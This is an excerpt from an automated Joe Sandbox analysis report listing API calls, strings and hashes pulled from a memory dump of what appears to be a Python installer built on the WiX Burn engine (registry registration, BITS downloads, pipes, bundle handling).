                                                                                                                                  Strings
                                                                                                                                  • Failed to delete run key value., xrefs: 0048F465
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\registration.cpp, xrefs: 0048F45B, 0048F4A9
                                                                                                                                  • burn.runonce, xrefs: 0048F371
                                                                                                                                  • Failed to write run key value., xrefs: 0048F3D2
                                                                                                                                  • BundleResumeCommandLine, xrefs: 0048F3DF, 0048F472
                                                                                                                                  • Installed, xrefs: 0048F33C
                                                                                                                                  • Failed to format resume command line for RunOnce., xrefs: 0048F390
                                                                                                                                  • Failed to delete resume command line value., xrefs: 0048F4B3
                                                                                                                                  • Failed to write resume command line value., xrefs: 0048F3F4
                                                                                                                                  • Failed to write Resume value., xrefs: 0048F32A
                                                                                                                                  • Resume, xrefs: 0048F319
                                                                                                                                  • "%ls" /%ls, xrefs: 0048F37C
                                                                                                                                  • Failed to write Installed value., xrefs: 0048F34D
                                                                                                                                  • Failed to create run key., xrefs: 0048F3B4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseValueVersion
                                                                                                                                  • String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$c:\agent\_work\138\s\src\burn\engine\registration.cpp
                                                                                                                                  • API String ID: 2348918689-1449905986
                                                                                                                                  • Opcode ID: 21566404a16d9f51d313ff326d41955fe44af50e591e23c5380a59a6f18847bb
                                                                                                                                  • Instruction ID: 4ee8a7801cd56f41d0553190196ade918c861e1e14fba55799c931af14d74150
                                                                                                                                  • Opcode Fuzzy Hash: 21566404a16d9f51d313ff326d41955fe44af50e591e23c5380a59a6f18847bb
                                                                                                                                  • Instruction Fuzzy Hash: AE511632A40326BBCF11BAA18C16FAF7664AF10B14F24493BFD01B2261D77C8904879C
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcessId.KERNEL32(771A8FB0,00000000,00000000), ref: 004ACA8E
                                                                                                                                    • Part of subcall function 00494E07: UuidCreate.RPCRT4(?), ref: 00494E3A
                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,004A22B1,?,?,00000000,?,?,?), ref: 004ACB6C
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 004ACB76
                                                                                                                                  • GetProcessId.KERNEL32(004A22B1,?,?,00000000,?,?,?,?), ref: 004ACBAE
                                                                                                                                    • Part of subcall function 0049554D: lstrlenW.KERNEL32(?,?,00000000,?,?,00000000,75A4B390,?,004845B7,?,004CB4F0), ref: 0049556E
                                                                                                                                    • Part of subcall function 0049554D: GetCurrentProcessId.KERNEL32(?,004845B7,?,004CB4F0), ref: 00495579
                                                                                                                                    • Part of subcall function 0049554D: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,004845B7,?,004CB4F0), ref: 004955B0
                                                                                                                                    • Part of subcall function 0049554D: ConnectNamedPipe.KERNEL32(?,00000000,?,004845B7,?,004CB4F0), ref: 004955C5
                                                                                                                                    • Part of subcall function 0049554D: GetLastError.KERNEL32(?,004845B7,?,004CB4F0), ref: 004955CF
                                                                                                                                    • Part of subcall function 0049554D: Sleep.KERNEL32(00000064,?,004845B7,?,004CB4F0), ref: 00495604
                                                                                                                                    • Part of subcall function 0049554D: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,004845B7,?,004CB4F0), ref: 00495627
                                                                                                                                    • Part of subcall function 0049554D: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,004845B7,?,004CB4F0), ref: 00495642
                                                                                                                                    • Part of subcall function 0049554D: WriteFile.KERNEL32(?,004845B7,004CB4F0,00000000,00000000,?,004845B7,?,004CB4F0), ref: 0049565D
                                                                                                                                    • Part of subcall function 0049554D: WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,004845B7,?,004CB4F0), ref: 00495678
                                                                                                                                    • Part of subcall function 004C0EA4: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,00484F98,?,000000FF,?,?,?,?,?,00000000,?,?,?), ref: 004C0EB0
                                                                                                                                    • Part of subcall function 004C0EA4: GetLastError.KERNEL32(?,00484F98,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 004C0EBE
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,004AC9E2,?,?,?,?,?,00000000,?,?,?,?), ref: 004ACC32
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,004AC9E2,?,?,?,?,?,00000000,?,?,?,?), ref: 004ACC41
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,004AC9E2,?,?,?,?,?,00000000,?,?,?), ref: 004ACC58
                                                                                                                                  Strings
                                                                                                                                  • %ls -%ls %ls %ls %u, xrefs: 004ACB31
                                                                                                                                  • Failed to create embedded pipe., xrefs: 004ACB18
                                                                                                                                  • Failed to create embedded process at path: %ls, xrefs: 004ACBA4
                                                                                                                                  • Failed to wait for embedded process to connect to pipe., xrefs: 004ACBD0
                                                                                                                                  • Failed to wait for embedded executable: %ls, xrefs: 004ACC15
                                                                                                                                  • Failed to create embedded pipe name and client token., xrefs: 004ACAF1
                                                                                                                                  • burn.embedded, xrefs: 004ACB29
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\embedded.cpp, xrefs: 004ACB97
                                                                                                                                  • Failed to process messages from embedded message., xrefs: 004ACBF5
                                                                                                                                  • Failed to allocate embedded command., xrefs: 004ACB45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
                                                                                                                                  • String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$c:\agent\_work\138\s\src\burn\engine\embedded.cpp
                                                                                                                                  • API String ID: 875070380-4141207472
                                                                                                                                  • Opcode ID: 499e013c7dbff464686620f2cd10e7b1005183a3553b44ec01394376ddba3315
                                                                                                                                  • Instruction ID: c699ead6e66d4f7f0d5c5d3f59a7c4e8170936aec6e41380f16bcff739019409
                                                                                                                                  • Opcode Fuzzy Hash: 499e013c7dbff464686620f2cd10e7b1005183a3553b44ec01394376ddba3315
                                                                                                                                  • Instruction Fuzzy Hash: C851B132D00229BBCF51EB94DD42FEEBBB8AF14710F100127FA00B6290D7799A408BD9
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,004C8848,00000001,?), ref: 004C837E
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,004C8848,00000001,?), ref: 004C8399
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,004C8848,00000001,?), ref: 004C83B4
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,004C8848,00000001,?), ref: 004C8420
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,004C8848,00000001,?), ref: 004C8444
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,004C8848,00000001,?), ref: 004C8468
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,004C8848,00000001,?), ref: 004C8488
                                                                                                                                  • lstrlenW.KERNEL32(006C0064,?,004C8848,00000001,?), ref: 004C84A3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareString$lstrlen
                                                                                                                                  • String ID: algorithm$c:\agent\_work\138\s\src\libs\dutil\apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
                                                                                                                                  • API String ID: 1657112622-1522978707
                                                                                                                                  • Opcode ID: 898e00b8dc8e91c7e09e14c0ba065326c4bd0c1dcbea4e856bb8c7e6d183fc8a
                                                                                                                                  • Instruction ID: 4ad6c94a53e83990e5cf64bb513e890be8716343dec299e1f1a535096e2bca69
                                                                                                                                  • Opcode Fuzzy Hash: 898e00b8dc8e91c7e09e14c0ba065326c4bd0c1dcbea4e856bb8c7e6d183fc8a
                                                                                                                                  • Instruction Fuzzy Hash: 7551D434648712BBDB605F558C46F267A61EB11B30F30471EF934AE2E1DBA9E841879C
                                                                                                                                  APIs
                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0048A167
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open@16
                                                                                                                                  • String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                                                                                                  • API String ID: 3613110473-2134270738
                                                                                                                                  • Opcode ID: 2cc1714107da152b15992a9a9d37c4129e48817aac79be84615a27ec1a568ab6
                                                                                                                                  • Instruction ID: 352961a0ea11f2beab063de865376b6cbd4d0c30b4b65b3f0a8856ac039f9d29
                                                                                                                                  • Opcode Fuzzy Hash: 2cc1714107da152b15992a9a9d37c4129e48817aac79be84615a27ec1a568ab6
                                                                                                                                  • Instruction Fuzzy Hash: 4E611736940114FBEB61BE998945F9E7B64EB04704F2049AFF900BA340D3BEDE21975E
                                                                                                                                  APIs
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0048EEF1
                                                                                                                                    • Part of subcall function 00483A1A: GetProcessHeap.KERNEL32(?,000001C7,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A2B
                                                                                                                                    • Part of subcall function 00483A1A: RtlAllocateHeap.NTDLL(00000000,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A32
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0048EEA9
                                                                                                                                  Strings
                                                                                                                                  • Failed to get software tag count., xrefs: 0048EDB8
                                                                                                                                  • Failed to convert SoftwareTag text to UTF-8, xrefs: 0048EF24
                                                                                                                                  • Failed to get SoftwareTag text., xrefs: 0048EF2E
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\registration.cpp, xrefs: 0048EDE6
                                                                                                                                  • Failed to get @Filename., xrefs: 0048EF4C
                                                                                                                                  • Failed to get @Path., xrefs: 0048EF38
                                                                                                                                  • Failed to get next node., xrefs: 0048EF56
                                                                                                                                  • Failed to allocate memory for software tag structs., xrefs: 0048EDF0
                                                                                                                                  • Path, xrefs: 0048EE57
                                                                                                                                  • SoftwareTag, xrefs: 0048ED72
                                                                                                                                  • Failed to get @Regid., xrefs: 0048EF42
                                                                                                                                  • Regid, xrefs: 0048EE3F
                                                                                                                                  • Failed to select software tag nodes., xrefs: 0048ED93
                                                                                                                                  • Filename, xrefs: 0048EE24
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeapString$AllocateProcess
                                                                                                                                  • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$c:\agent\_work\138\s\src\burn\engine\registration.cpp
                                                                                                                                  • API String ID: 336948655-1592394165
                                                                                                                                  • Opcode ID: 9883be6d241a77f1e3b05c07832dcb06805b3921ee4732acc271f0f81147dbd1
                                                                                                                                  • Instruction ID: 8cdc0aeda6f3293fea2ad0f003b8fdf93d6a846e97d7c47ea25e3f9b74c9567e
                                                                                                                                  • Opcode Fuzzy Hash: 9883be6d241a77f1e3b05c07832dcb06805b3921ee4732acc271f0f81147dbd1
                                                                                                                                  • Instruction Fuzzy Hash: 0D51D475A01316BBDB11EF56C895FAEBBA5AF04B00B10496FFD01AB250C738DE008758
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 00494BF7
                                                                                                                                  • GetLastError.KERNEL32 ref: 00494C05
                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00494C29
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorFileLastSleep
                                                                                                                                  • String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$c:\agent\_work\138\s\src\burn\engine\pipe.cpp$feclient.dll
                                                                                                                                  • API String ID: 408151869-1154546980
                                                                                                                                  • Opcode ID: 8c42c0db6c4ba85c3ad8f047c7ce5008e18aab2b6c5b788aa51a4d1f5e7ad464
                                                                                                                                  • Instruction ID: 432c9ba30a1886c3e12d1bb85578d25eff3c63622433b8af20333e006dd93b8c
                                                                                                                                  • Opcode Fuzzy Hash: 8c42c0db6c4ba85c3ad8f047c7ce5008e18aab2b6c5b788aa51a4d1f5e7ad464
                                                                                                                                  • Instruction Fuzzy Hash: CD41243A981636BBCB215AA1CD06F5E7E54AF80724F224237FD10BA290D77C9D0196DC
                                                                                                                                  APIs
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00490565,InstallerVersion,InstallerVersion,00000000,00490565,InstallerName,InstallerName,00000000,00490565,Date,InstalledDate,00000000,00490565,LogonUser), ref: 0048F7C6
                                                                                                                                    • Part of subcall function 004C199A: RegSetValueExW.ADVAPI32(00020006,004D0FB8,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0048F3CC,00000000,?,00020006), ref: 004C19CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseValue
                                                                                                                                  • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                                                                                                  • API String ID: 3132538880-2703781546
                                                                                                                                  • Opcode ID: 8f6f00cd17cea27f3c858bfb43473412e8ac3966db62936ca680db16290c8df5
                                                                                                                                  • Instruction ID: 8ddf887c89103b743898b059754f06f29ad7e888f58a2d9fc750ac3a90d75b5e
                                                                                                                                  • Opcode Fuzzy Hash: 8f6f00cd17cea27f3c858bfb43473412e8ac3966db62936ca680db16290c8df5
                                                                                                                                  • Instruction Fuzzy Hash: 0441F535E40625B7DB227651CD12FAE7A24DB10B14F21097BFC00B6361C7BC9D16A79D
                                                                                                                                  APIs
                                                                                                                                  • TlsSetValue.KERNEL32(?,?), ref: 0049E766
                                                                                                                                  • RegisterClassW.USER32(?), ref: 0049E792
                                                                                                                                  • GetLastError.KERNEL32 ref: 0049E79D
                                                                                                                                  • CreateWindowExW.USER32(00000080,004DA23C,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 0049E804
                                                                                                                                  • GetLastError.KERNEL32 ref: 0049E80E
                                                                                                                                  • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 0049E8AC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                  • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$c:\agent\_work\138\s\src\burn\engine\uithread.cpp
                                                                                                                                  • API String ID: 213125376-2797729333
                                                                                                                                  • Opcode ID: 43216ddeb5c9278e7d34fce481ab972cb68c46b7a7514beff4fce7aa5f4bad88
                                                                                                                                  • Instruction ID: 916d4b3375b0289271905b832ccc790aa42a7f1345e10c7ccc6096e9ec82b411
                                                                                                                                  • Opcode Fuzzy Hash: 43216ddeb5c9278e7d34fce481ab972cb68c46b7a7514beff4fce7aa5f4bad88
                                                                                                                                  • Instruction Fuzzy Hash: 60419E72900215ABDF20DBE29C49EDEBEB8FF04761F144177F905AB250DB3599018BEA
                                                                                                                                  Strings
                                                                                                                                  • Failed to copy cache id for passthrough pseudo bundle., xrefs: 004AC802
                                                                                                                                  • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 004AC8A9
                                                                                                                                  • Failed to recreate command-line arguments., xrefs: 004AC840
                                                                                                                                  • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 004AC7E4
                                                                                                                                  • Failed to copy related arguments for passthrough bundle package, xrefs: 004AC87F
                                                                                                                                  • Failed to copy download source for passthrough pseudo bundle., xrefs: 004AC78C
                                                                                                                                  • Failed to copy key for passthrough pseudo bundle payload., xrefs: 004AC7C2
                                                                                                                                  • Failed to copy local source path for passthrough pseudo bundle., xrefs: 004AC7B4
                                                                                                                                  • Failed to allocate memory for pseudo bundle payload hash., xrefs: 004AC7AA
                                                                                                                                  • Failed to copy install arguments for passthrough bundle package, xrefs: 004AC85F
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\pseudobundle.cpp, xrefs: 004AC5A5, 004AC79E, 004AC7D8
                                                                                                                                  • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 004AC5B1
                                                                                                                                  • Failed to copy filename for passthrough pseudo bundle., xrefs: 004AC7BB
                                                                                                                                  • Failed to copy key for passthrough pseudo bundle., xrefs: 004AC785
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                  • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$c:\agent\_work\138\s\src\burn\engine\pseudobundle.cpp
                                                                                                                                  • API String ID: 1357844191-3179816169
                                                                                                                                  • Opcode ID: ed923f31358b8737cd9efd57ff05d8c3f09ee38f496579a96e2c64701455d9dd
                                                                                                                                  • Instruction ID: d9e81c4924735f5bd502520c9455f335b8703dec86daeebfc76c60ddb61908a6
                                                                                                                                  • Opcode Fuzzy Hash: ed923f31358b8737cd9efd57ff05d8c3f09ee38f496579a96e2c64701455d9dd
                                                                                                                                  • Instruction Fuzzy Hash: E6B1983AA00616EFCB51DF69C881F59BBA0BF18704F1081AAFC149B351C779E861DF98
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,00000000,00000000,?), ref: 004ADC24
                                                                                                                                  Strings
                                                                                                                                  • Failed to set callback interface for BITS job., xrefs: 004ADD5C
                                                                                                                                  • Invalid BITS engine URL: %ls, xrefs: 004ADC46
                                                                                                                                  • Falied to start BITS job., xrefs: 004ADDDC
                                                                                                                                  • Failed to add file to BITS job., xrefs: 004ADCF1
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\bitsengine.cpp, xrefs: 004ADC3A, 004ADD2D
                                                                                                                                  • Failed to copy download URL., xrefs: 004ADC6B
                                                                                                                                  • Failed while waiting for BITS download., xrefs: 004ADDD5
                                                                                                                                  • Failed to initialize BITS job callback., xrefs: 004ADD45
                                                                                                                                  • Failed to create BITS job callback., xrefs: 004ADD37
                                                                                                                                  • Failed to download BITS job., xrefs: 004ADDBB
                                                                                                                                  • Failed to set credentials for BITS job., xrefs: 004ADCD2
                                                                                                                                  • Failed to complete BITS job., xrefs: 004ADDCE
                                                                                                                                  • Failed to create BITS job., xrefs: 004ADCB3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen
                                                                                                                                  • String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$c:\agent\_work\138\s\src\burn\engine\bitsengine.cpp
                                                                                                                                  • API String ID: 1659193697-2643649894
                                                                                                                                  • Opcode ID: adf82684067a093c895f104ed1a5b1659d107eb516fd4593a53b89a51d5c19bb
                                                                                                                                  • Instruction ID: 3898d6369fb0ed3f469624c5e34a364a17e481ea6e0e1db1618fc45e97f70796
                                                                                                                                  • Opcode Fuzzy Hash: adf82684067a093c895f104ed1a5b1659d107eb516fd4593a53b89a51d5c19bb
                                                                                                                                  • Instruction Fuzzy Hash: F0510735E40261EBCB119F95C885F9E7BB4DF2AB20B21415BFC06AB650DB7CDD409B88
                                                                                                                                  APIs
                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0048BDA1
                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0048BEAE
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0048BEB8
